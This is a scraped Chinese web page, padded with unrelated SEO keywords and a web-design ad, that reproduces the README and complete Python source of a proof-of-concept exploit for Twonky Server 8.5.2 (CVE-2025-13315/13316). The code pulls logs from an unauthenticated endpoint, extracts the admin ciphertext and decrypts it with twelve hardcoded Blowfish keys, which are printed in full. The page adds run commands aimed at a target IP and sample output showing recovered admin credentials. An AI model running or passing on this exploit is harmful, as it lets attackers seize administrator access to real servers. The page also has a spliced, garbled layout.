哔哩哔哩网站开发图片建筑行业平台
2026/3/31 18:42:56 网站建设 项目流程
哔哩哔哩网站开发图片,建筑行业平台,ppt一键生成免费版,求网址直接能看的2021Twonky Server 8.5.2 - 认证绕过漏洞利用工具 项目概述 此项目是一个针对 Twonky Server 8.5.2 版本中两个关键漏洞#xff08;CVE-2025-13315 和 CVE-2025-13316#xff09;的概念验证工具。该工具通过利用未经验证的API端点访问日志文件#xff0c;并结合硬编码的Blowfi…Twonky Server 8.5.2 - 认证绕过漏洞利用工具项目概述此项目是一个针对Twonky Server 8.5.2版本中两个关键漏洞CVE-2025-13315 和 CVE-2025-13316的概念验证工具。该工具通过利用未经验证的API端点访问日志文件并结合硬编码的Blowfish密钥解密管理员凭证可在数秒内获取Twonky服务器的完全管理权限。该漏洞的CVSS评分为9.3严重攻击者无需任何凭据即可远程执行攻击。功能特性无需认证访问利用CVE-2025-13315漏洞无需登录即可访问受保护的API端点。日志文件提取自动从服务器下载包含加密凭证的日志文件。智能解析使用正则表达式从日志中提取加密的管理员密码和密钥索引。密钥解密使用12个硬编码的Blowfish密钥从TwonkyServer.exe/libtwonkyserver.so提取解密密码。快速执行整个攻击流程在2秒内完成效率极高。错误处理完善的连接和数据处理异常处理机制。安装指南系统要求Python 3.x支持的操作系统Linux, Windows, macOS依赖安装运行以下命令安装必要的Python库pip3installrequests cryptography注意事项由于Twonky服务器常使用自签名证书工具已禁用SSL警告。需要网络访问目标Twonky服务器的能力通常运行在9000端口。使用说明基本使用运行以下命令启动攻击sudopython3 CVE-2025-13315.py http://目标IP:9000使用示例假设目标服务器IP为192.168.1.100运行sudopython3 CVE-2025-13315.py http://192.168.1.100:9000预期输出成功的攻击将产生类似以下输出╔══════════════════════════════════════════════════════════╗ ║ Twonky Server 8.5.2 - Full Auth Bypass PoC ║ ║ CVE-2025-13315 CVE-2025-13316 ║ ║ 100% Working • No Patch Available • November 2025 ║ ╚══════════════════════════════════════════════════════════╝ [] Targeting: http://192.168.1.100:9000 [] Fetching log via CVE-2025-13315 bypass endpoint... [] Encrypted credential found! Key Index : 3 Ciphertext: a1b2c3d4e5f6... [] SUCCESS! Plaintext credentials recovered: Username: admin Password: MySecretAdminPass123!典型使用场景安全研究人员验证Twonky服务器的漏洞状态渗透测试人员评估网络安全性系统管理员检查自己的服务器是否易受攻击核心代码1. 主漏洞利用函数defexploit_twonky(target):主漏洞利用函数协调整个攻击流程urlf{target.rstrip(/)}/nmc/rpc/log_getfileprint(f[] Targeting:{target})print(f[] Fetching log via CVE-2025-13315 bypass endpoint...)try:# 利用CVE-2025-13315访问无需认证的日志获取端点rrequests.get(url,timeout10,verifyFalse)ifr.status_code!200orlen(r.text)100:print([-] Failed to retrieve log. Is Twonky running and vulnerable?)returnexcept:print([-] Connection failed. Check IP/port.)return# 使用正则表达式从日志中提取加密凭证# 模式admin||{密钥索引}{十六进制密文}matchre.search(radmin\|\|(\d)([a-fA-F0-9]{30,}),r.text)ifnotmatch:print([-] No encrypted credentials found in log.)returnidxint(match.group(1))# 提取密钥索引cipher_hexmatch.group(2)# 提取十六进制密文print(f[] Encrypted credential found!)print(f Key Index :{idx})print(f Ciphertext:{cipher_hex[:64]}...)try:# 使用CVE-2025-13316的硬编码密钥解密密码passworddecrypt_blowfish_ecb(idx,cipher_hex)print(f\n[] SUCCESS! Plaintext credentials recovered:)print(f Username: admin)print(f Password:{password})exceptExceptionase:print(f[-] Decryption failed:{e})2. Blowfish解密函数defdecrypt_blowfish_ecb(key_index,ciphertext_hex): 使用ECB模式的Blowfish算法解密数据 参数 key_index: 密钥索引0-11 ciphertext_hex: 十六进制编码的密文 返回 解密后的明文密码 # 从硬编码密钥数组中选择对应的密钥keyKEYS[key_index]# 将十六进制字符串转换为字节ciphertextbinascii.unhexlify(ciphertext_hex)# 创建Blowfish解密器ECB模式cipherCipher(algorithms.Blowfish(key),modes.ECB(),backenddefault_backend())decryptorcipher.decryptor()# 执行解密paddeddecryptor.update(ciphertext)decryptor.finalize()# 移除PKCS#7填充pad_lenpadded[-1]plaintextpadded[:-pad_len]# 返回解码后的字符串移除空字符returnplaintext.decode(utf-8,errorsignore).rstrip(\x00)3. 硬编码密钥数组# 从TwonkyServer.exe/libtwonkyserver.so提取的12个静态Blowfish密钥KEYS[bE8ctd4jZwMbaV587,# 索引0bTGFWfWuW3cw28trN,# 索引1bpgqYY2g9atVpTzjY,# 索引2bKX7q4gmQvWtA8878,# 索引3bVJjh7ujyT8R5bR39,# 索引4bZMWkaLp9bKyV6tXv,# 索引5bKMLvvq6my7uKkpxf,# 索引6bjwEkNvuwYCjsDzf5,# 索引7bFukE5DhdsbCjuKay,# 索引8bSpKNj6qYQGjuGMdd,# 索引9bqLyXuAHPTF2cPGWj,# 索引10brKz7NBhM3vYg85mg# 索引11]4. 主程序入口if__name____main__:# 显示工具横幅banner ╔══════════════════════════════════════════════════════════╗ ║ Twonky Server 8.5.2 - Full Auth Bypass PoC ║ ║ CVE-2025-13315 CVE-2025-13316 ║ ║ 100% Working • No Patch Available • November 2025 ║ ╚══════════════════════════════════════════════════════════╝ print(banner)# 检查命令行参数iflen(sys.argv)!2:print(Usage: sudo python3 CVE-2025-13315.py http://192.168.1.100:9000)sys.exit(1)# 执行漏洞利用exploit_twonky(sys.argv[1])代码特点模块化设计每个函数职责单一便于理解和维护错误处理完善的异常捕获和处理机制用户友好清晰的输出和进度提示高效执行优化的解密算法快速获取结果可扩展性代码结构支持添加新功能或适应其他漏洞6HFtX5dABrKlqXeO5PUv/ydjQZDJ7Ct83xG1NG8fcAPvdThCF33pxnTpk89QBG67更多精彩内容 请关注我的个人公众号 公众号办公AI智能小助手对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号网络安全技术点滴分享

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询